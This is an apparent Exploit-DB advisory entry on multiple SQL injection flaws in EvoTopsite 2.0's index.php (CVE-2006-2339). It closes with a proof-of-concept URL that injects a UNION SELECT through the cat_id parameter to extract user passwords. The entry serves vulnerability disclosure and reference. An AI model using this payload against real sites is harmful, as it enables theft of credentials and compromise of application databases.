EvoTopsite 2.0 Index.PHP Multiple SQL Injection Vulnerabilities

2006-05-08T00:00:00
ID EDB-ID:27837
Type exploitdb
Reporter Hamid Ebadi
Modified 2006-05-08T00:00:00

Description

EvoTopsite 2.0 Index.PHP Multiple SQL Injection Vulnerabilities. CVE-2006-2339 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/17893/info

evoTopsite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. 

Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/products/evotopsites/demo/index.php?cat_id=-13'%20union%20select%20password%20from%20evots_user%20%20where%20'1'='1